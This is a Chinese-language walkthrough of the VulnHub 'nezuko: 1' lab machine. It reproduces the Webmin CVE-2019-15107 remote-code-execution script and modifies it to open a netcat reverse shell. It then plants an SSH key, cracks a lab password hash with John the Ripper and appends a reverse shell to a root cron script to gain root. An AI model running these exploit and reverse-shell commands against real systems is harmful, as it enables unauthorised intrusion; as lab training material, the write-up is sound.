靶場(chǎng)描述和提示：

Creator : @yunaranyancat (Twitter)

Difficulty : Easy ~ Intermediate

OS Used: Ubuntu 18.04

User : root, zenitsu, nezuko

Hashes : at their home directory

任務(wù)：獲取三個(gè)用戶(hù)目錄下的hash字符串

1、信息收集

nmap開(kāi)路

msf5 > db_nmap -T4 10.1.1.0/24
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 16:38 CST
[*] Nmap: Nmap scan report for 10.1.1.1
[*] Nmap: Host is up (0.000061s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT ? STATE SERVICE
[*] Nmap: 53/tcp open ?domain
[*] Nmap: MAC Address: 00:50:56:E9:10:7F (VMware)
[*] Nmap: Nmap scan report for 10.1.1.129
[*] Nmap: Host is up (0.00054s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT ? STATE SERVICE
[*] Nmap: 22/tcp open ?ssh
[*] Nmap: 80/tcp open ?http
[*] Nmap: MAC Address: 00:0C:29:4E:52:32 (VMware)
[*] Nmap: Nmap scan report for 10.1.1.254
[*] Nmap: Host is up (0.000047s latency).
[*] Nmap: All 1000 scanned ports on 10.1.1.254 are filtered
[*] Nmap: MAC Address: 00:50:56:FB:FE:72 (VMware)
[*] Nmap: Nmap scan report for 10.1.1.130
[*] Nmap: Host is up (0.0000060s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT ? STATE SERVICE
[*] Nmap: 22/tcp open ?ssh
[*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 5.49 seconds
msf5 >

除去網(wǎng)關(guān)和本機(jī)外，找到靶機(jī)的IP。

使用nmap -p- -A target_ip更加詳盡的探測(cè)一下這個(gè)IP

msf5 > db_nmap -p- -A 10.1.1.129
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 16:42 CST
[*] Nmap: Nmap scan report for 10.1.1.129
[*] Nmap: Host is up (0.00060s latency).
[*] Nmap: Not shown: 65532 closed ports
[*] Nmap: PORT ? ? ?STATE SERVICE VERSION
[*] Nmap: 22/tcp ? ?open ?ssh ? ? OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: | ? 2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
[*] Nmap: | ? 256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
[*] Nmap: |_ ?256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
[*] Nmap: 80/tcp ? ?open ?http ? ?Apache httpd 2.4.29 ((Ubuntu))
[*] Nmap: |_http-server-header: Apache/2.4.29 (Ubuntu)
[*] Nmap: |_http-title: Welcome to my site! - nezuko kamado
[*] Nmap: 13337/tcp open ?http ? ?MiniServ 1.920 (Webmin httpd)
[*] Nmap: | http-robots.txt: 1 disallowed entry
[*] Nmap: |_/
[*] Nmap: |_http-title: Login to Webmin
[*] Nmap: MAC Address: 00:0C:29:4E:52:32 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 3.X|4.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
[*] Nmap: OS details: Linux 3.2 - 4.9
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ? ? ADDRESS
[*] Nmap: 1 ? 0.60 ms 10.1.1.129
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 45.59 seconds
msf5 >

發(fā)現(xiàn)三個(gè)服務(wù)和端口是開(kāi)放的：

22：SSH服務(wù)、80：HTTP服務(wù)、13337 ：Webmin服務(wù)

訪(fǎng)問(wèn)一下HTTP服務(wù)看看有什么東西：有一個(gè)畫(huà)風(fēng)有點(diǎn)詭異的動(dòng)畫(huà)（Nezuko是一個(gè)日本動(dòng)漫角色），和一句提示：“ Welcome to my site. I didn't put anything yet. Please come back again later ”，翻譯過(guò)來(lái)應(yīng)該是：“此地?zé)o銀三百兩”。我信你個(gè)鬼，你個(gè)糟老頭壞得很。

經(jīng)過(guò)一番探索，發(fā)現(xiàn)確實(shí)沒(méi)有什么可利用的點(diǎn)（老外挺實(shí)誠(chéng)的，說(shuō)沒(méi)有就真沒(méi)有）。

我們?cè)倏纯?13337 端口的Webmin服務(wù)：

2、獲取Shell

結(jié)合前面探測(cè)到的Webmin版本是1.920，可以去百度一下（Google it），然后找到了這個(gè)：

Webmin 1.920 - Remote Code Execution (CVE-2019-15107)

https://www.exploit-db.com/exploits/47293

直接上poc：

root@osboxes:/tmp# cat poc.sh
#!/bin/sh
#
# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#

FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

if [ $? -eq 0 ];
then
? ? ? ?echo '\033[0;31mVULNERABLE!\033[0m'
else
? ? ? ?echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi
#EOF
root@osboxes:/tmp#root@osboxes:/tmp# ./poc.sh https://10.1.1.129:13337
Testing for RCE (CVE-2019-15107) on https://10.1.1.129:13337: VULNERABLE!
root@osboxes:/tmp#

提示存在漏洞。

那么就好辦了，直接來(lái)反彈一個(gè)shell吧

然后改一下poc.sh這個(gè)腳本，把腳本里面執(zhí)行echo '$FLAG'的那一段，改成nc -e /bin/bash attack_ip port就好了，改好之后就是這樣的：

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 10.1.1.130 7777&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

然后nc開(kāi)監(jiān)聽(tīng)，再執(zhí)行poc.sh就能收到shell了

root@osboxes:/tmp# nc -lvp 7777
listening on [any] 7777 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 51590root@osboxes:/tmp# ./poc.sh https://10.1.1.129:13337
Testing for RCE (CVE-2019-15107) on https://10.1.1.129:13337:

執(zhí)行一些常用命令，看看是什么權(quán)限？

root@osboxes:/tmp# nc -lvp 7777
listening on [any] 7777 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 51590
id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
ls /
bin
boot

我們得到的一個(gè)普通用戶(hù)：nezuko的shell

升級(jí)為SSH會(huì)話(huà)，很簡(jiǎn)單，在攻擊機(jī)上生成一個(gè)ssh key，然后寫(xiě)入到目標(biāo)機(jī)就能ssh免密登錄了。

本地生成密鑰：

root@osboxes:/tmp# ssh-keygen -t rsa ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
Generating public/private rsa key pair. ? ? ? ? ? ? ? ? ? ? ? ? ? ?
Enter file in which to save the key (/root/.ssh/id_rsa): sshkey ? ?
Enter passphrase (empty for no passphrase): ? ? ? ? ? ? ? ? ? ? ? ?
Enter same passphrase again: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
Your identification has been saved in sshkey. ? ? ? ? ? ? ? ? ? ? ?
Your public key has been saved in sshkey.pub. ? ? ? ? ? ? ? ? ? ? ?
The key fingerprint is: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
SHA256:DDIRhslt7EUNR8P5py1hq1Q9CXN1nbk8s0XGBi+nAfo root@osboxes ? ?
The key's randomart image is: ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
+---[RSA 2048]----+ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| . =+oo=+. ?..oo=| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ?+.+...+.o... =*| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? oo.. ?..= .+++| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ?.o o ?=.= ?X.| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ? ? ?So *E.. =| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ? ? ?. + . ?. | ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ? ? . . . ? ? | ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ? ? ?. ? ? ? ?| ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
| ? ? ? ? ? ? ? ? | ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
+----[SHA256]-----+ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
root@osboxes:/tmp# ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?

復(fù)制公鑰內(nèi)容，在目標(biāo)機(jī)shell里面寫(xiě)入到authorized_keys文件。

root@osboxes:/tmp# cat sshkey.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyD+owxKMrS8dGHsh2Cct8SB6/60S6UsTy/K+eSexh1tC+cT6E9RjtUpbtFnyZBlm9ICmrBlrun0OR8UhoeA0/b8rbl8QZbsDYYj1wHGkrL8QrxzMypfaCUTRl/eu/ADyyvpGtjmxD0utNU56BUypXDYJIZbQ2VKx6FSwTbs0yrVNdiw6exrlF+louJKr28xb4t6+RAe1R/vGI/yAKHZFTlkpc7hz+B4w7F3kdDpg1YtiJslLAkYtbCU1pDvImjSltWHV6zrCQzyRbMya8F1kvEF4UhjTFmnsgCHJfvTXLt8uBBi1kS73fzEzMvlqZ+T/8cMIZdkCjew7/rzCVmshR root@osboxes
root@osboxes:/tmp#echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyD+owxKMrS8dGHsh2Cct8SB6/60S6UsTy/K+eSexh1tC+cT6E9RjtUpbtFnyZBlm9ICmrBlrun0OR8UhoeA0/b8rbl8QZbsDYYj1wHGkrL8QrxzMypfaCUTRl/eu/ADyyvpGtjmxD0utNU56BUypXDYJIZbQ2VKx6FSwTbs0yrVNdiw6exrlF+louJKr28xb4t6+RAe1R/vGI/yAKHZFTlkpc7hz+B4w7F3kdDpg1YtiJslLAkYtbCU1pDvImjSltWHV6zrCQzyRbMya8F1kvEF4UhjTFmnsgCHJfvTXLt8uBBi1kS73fzEzMvlqZ+T/8cMIZdkCjew7/rzCVmshR root@osboxes" > /home/nezuko/.ssh/authorized_keys

然后ssh連接：

root@osboxes:/tmp# ssh -i sshkey nezuko@10.1.1.129 //用密鑰登錄
The authenticity of host '10.1.1.129 (10.1.1.129)' can't be established.
ECDSA key fingerprint is SHA256:V+CV/i2363VkhS3dZOGMbavZHVA2zbsG5k0emqBTJZ4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.129' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)

* Documentation: ?https://help.ubuntu.com
* Management: ? ? https://landscape.canonical.com
* Support: ? ? ? ?https://ubuntu.com/advantage


* Canonical Livepatch is available for installation.
? - Reduce system reboots and improve kernel security. Activate at:
? ? https://ubuntu.com/livepatch

404 packages can be updated.
189 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Wed Aug 21 01:12:52 2019
nezuko@ubuntu:~$ //登錄成功

登錄成功了。

如果你不想這么麻煩，直接用python -c 'import pty;pty.spawn("/bin/bash")'實(shí)現(xiàn)一個(gè)shell也可以。

3、橫向提權(quán)

目前，我們獲取的是一個(gè)普通用戶(hù)權(quán)限的shell，想想如何提權(quán)吧。

先看看當(dāng)前用戶(hù)能獲取的一些信息

nezuko@ubuntu:~$ pwd
nezuko@ubuntu:~$ ls -l
total 24
drwxr-xr-x 2 nezuko nezuko ?4096 Ogos 28 21:45 from_zenitsu
-rw-rw-r-- 1 nezuko nezuko 19535 Ogos 21 00:25 nezuko.txt

看看nezuko.txt文件里面有什么：

nezuko@ubuntu:~$ cat nezuko.txt
Congratulations! You have found nezuko! Now, try to surpass your limit! Right here, right now...

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ....
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,


1af0941e0c4bd4564932184d47dd8bef
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?

有一句提示和一串hash

再看看from_zenitsu目錄下有啥:

nezuko@ubuntu:~/from_zenitsu$ ls -l
total 284
-rw-r--r-- 1 root root 54 Ogos 21 01:13 new_message_21-08-2019_01:13
-rw-r--r-- 1 root root 54 Ogos 21 09:11 new_message_21-08-2019_09:11
-rw-r--r-- 1 root root 54 Ogos 21 09:12 new_message_21-08-2019_09:12
....
-rw-r--r-- 1 root root 54 Ogos 28 21:35 new_message_28-08-2019_21:35
-rw-r--r-- 1 root root 54 Ogos 28 21:40 new_message_28-08-2019_21:40
-rw-r--r-- 1 root root 54 Ogos 28 21:45 new_message_28-08-2019_21:45
-rw-r--r-- 1 root root 54 Ogos 28 21:50 new_message_28-08-2019_21:50
-rw-r--r-- 1 root root 54 Ogos 28 21:55 new_message_28-08-2019_21:55
-rw-r--r-- 1 root root 54 Ogos 29 ?2019 new_message_29-08-2019_00:05
nezuko@ubuntu:~/from_zenitsu$

這就很有意思，好像這些文件是自動(dòng)創(chuàng)建的，而且是每5分鐘一個(gè)。

隨便看一個(gè)里面寫(xiě)了什么：

nezuko@ubuntu:~/from_zenitsu$ cat new_message_29-08-2019_00\:05
nezuko chan, would you like to go on a date with me? //這句話(huà)好曖昧~~
nezuko@ubuntu:~/from_zenitsu$

所以這些文件應(yīng)該是zenitsu這個(gè)用戶(hù)發(fā)來(lái)的。但文件的權(quán)限歸屬都是root，這就有點(diǎn)意思了。

所以，我們得橫向提權(quán)到zenitsu用戶(hù)看看。

先看看用戶(hù)情況：

nezuko@ubuntu:~/from_zenitsu$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin
nezuko@ubuntu:~/from_zenitsu$

我們發(fā)現(xiàn)zenitsu用戶(hù)的密碼hash被直接寫(xiě)在里面了。

用John The Ripper破解試試吧，找一個(gè)強(qiáng)大的字典，然后跑就是了

百度一下（Google it），找到一個(gè)字典合集：https://github.com/danielmiessler/SecLists

root@osboxes:/tmp# cat zenitsu_hash.txt
$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0
root@osboxes:/tmp#john --wordlist=rockyou.txt zenitsu_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password ? ? ? ? (?)
1g 0:00:00:01 DONE (2019-08-28 22:38) 0.5780g/s 4439p/s 4439c/s 4439C/s computador..escort
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@osboxes:/tmp# john zenitsu_hash.txt --show
?:password

1 password hash cracked, 0 left
root@osboxes:/tmp#

強(qiáng)大字典加持下，很快就破解出來(lái)了。我們切換到zenitsu用戶(hù)看看吧

nezuko@ubuntu:~/from_zenitsu$ su - zenitsu
Password:
zenitsu@ubuntu:~$ pwd
/home/zenitsu
zenitsu@ubuntu:~$ id
uid=1001(zenitsu) gid=1001(zenitsu) groups=1001(zenitsu)
zenitsu@ubuntu:~$ ls -l
total 16
drwxr-xr-x 2 zenitsu root ? ?4096 Ogos 21 09:39 to_nezuko
-rw-rw-r-- 1 zenitsu zenitsu 9343 Ogos 21 00:28 zenitsu.txt
zenitsu@ubuntu:~$

看到有一個(gè)目錄是to_nezuko，進(jìn)去看看吧

zenitsu@ubuntu:~$ cd to_nezuko/
zenitsu@ubuntu:~/to_nezuko$ ls -l
total 4
-rw-r--r-- 1 zenitsu root 150 Ogos 21 09:39 send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$

是一個(gè)腳本，可以看到這個(gè)腳本的權(quán)限是屬于zenitsu用戶(hù)和root組的，這個(gè)腳本的作用應(yīng)該就是發(fā)消息給nezuko用戶(hù)。

看看腳本內(nèi)容吧：

zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date zenitsu@ubuntu:~/to_nezuko$

沒(méi)錯(cuò)，這個(gè)就是每隔5分鐘就給nezuko發(fā)一條騷擾信息的腳本。

4、獲取root shell

結(jié)合前面我們獲取的信息，我們猜測(cè)這個(gè)腳本應(yīng)該是以root身份運(yùn)行的，這就能解釋為什么我們?cè)?code>nezuko用戶(hù)from_zenitsu目錄中看到的文件都是歸屬于root身份的。

既然這樣的話(huà)，我們把想要以root身份執(zhí)行的命令寫(xiě)入到這個(gè)腳本中，讓它執(zhí)行，不就可以獲得root權(quán)限了嗎？

當(dāng)我們?cè)囍蜷_(kāi)文件修改的時(shí)候，發(fā)現(xiàn)并不行：

"send_message_to_nezuko.sh" E212: Can't open file for writing
Press ENTER or type command to continue

這是為啥呢？看看是不是有隱藏權(quán)限：

zenitsu@ubuntu:~/to_nezuko$ lsattr send_message_to_nezuko.sh
-----a--------e--- send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$

發(fā)現(xiàn)有一個(gè)隱藏權(quán)限是a，也就是append。啥意思呢？就是某個(gè)檔案給予了a（append）的權(quán)限后，用戶(hù)只能追加內(nèi)容到此檔案，不能刪除、修改此檔案。那我們?cè)囋囎芳觾?nèi)容吧，這里就直接寫(xiě)一個(gè)nc反向連接吧：

zenitsu@ubuntu:~/to_nezuko$ echo "nc -e /bin/bash 10.1.1.130 9999" >> send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
nc -e /bin/bash 10.1.1.130 9999
zenitsu@ubuntu:~/to_nezuko$

開(kāi)監(jiān)聽(tīng)，等5分鐘：

root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...

漫長(zhǎng)的5分鐘，可以去休息一下~~

五分鐘后，收到root shell

root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 36210
root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 36210
id
uid=0(root) gid=0(root) groups=0(root)
ls -l
total 8
-rw-r--r-- 1 root root 7190 Ogos 21 00:42 root.txt
cat root.txt
Congratulations on getting the root shell!
Tell me what do you think about this box at my twitter, @yunaranyancat

5、后記

在破密碼部分，也可以用hashcat跑

反彈shell，也可以用msfvenom生成。

最后的拿root權(quán)限，也可以試試修改可執(zhí)行命令的權(quán)限，來(lái)實(shí)現(xiàn)，比如加suid權(quán)限

6、參考資料

靶機(jī)環(huán)境下載：nezuko: 1 ~ VulnHub https://www.vulnhub.com/entry/nezuko-1,352/